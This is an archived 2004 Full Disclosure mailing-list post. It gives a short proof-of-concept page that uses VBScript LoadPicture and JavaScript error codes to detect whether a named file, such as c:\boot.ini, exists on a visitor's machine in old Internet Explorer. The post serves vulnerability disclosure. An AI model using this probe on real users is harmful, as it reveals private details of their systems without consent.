Full Disclosure mailing list archives
(no subject)
From: Jelmer <jkuperus () planet nl>
Date: Sat, 07 Feb 2004 14:24:26 +0100
similar to http://www.securityfocus.com/archive/1/248143 http://www.greymagic.com/adv/gm008-ie/ http://www.guninski.com/wmp-desc.html no biggie --- snip -- <form onsubmit="doIt(this);return false"> <input name="filename" value="c:\boot.ini" size="80" type="text"><input type="submit"> </form> <script language="vbscript"> Sub loadIt(filename) LoadPicture(filename) End Sub </script> <script language="javascript"> function doIt(form) { try { loadIt(form.filename.value); } catch(e) { result = e.number; } if (result != -2146827856) { alert('file exists'); } else { alert('file does not exist'); } } </script> --- snip --
Current thread:
- (no subject) jim (Feb 04)
- <Possible follow-ups>
- (no subject) auto33661 (Feb 06)
- RE: (no subject) Aditya [ Aditya Lalit Deshmukh ] (Feb 07)
- RE: (no subject), whitehat tribute, phrack 64 daniel (Feb 07)
- RE: (no subject) Aditya [ Aditya Lalit Deshmukh ] (Feb 07)
- (no subject) Jelmer (Feb 07)
- Re: (no subject) KF (Feb 07)
- Re: (no subject) Paul Schmehl (Feb 07)
- Re: (no subject) (use a subject fools!) KF (Feb 07)
- Re: (no subject) CHS (Feb 07)
- Re: (no subject) Valdis . Kletnieks (Feb 07)
- RE: (no subject) Aditya [ Aditya Lalit Deshmukh ] (Feb 08)
- Re: (no subject) KF (Feb 07)
- Re: (no subject) Valdis . Kletnieks (Feb 07)
- Re: (no subject) KF (Feb 07)
- Re: (no subject) madsaxon (Feb 11)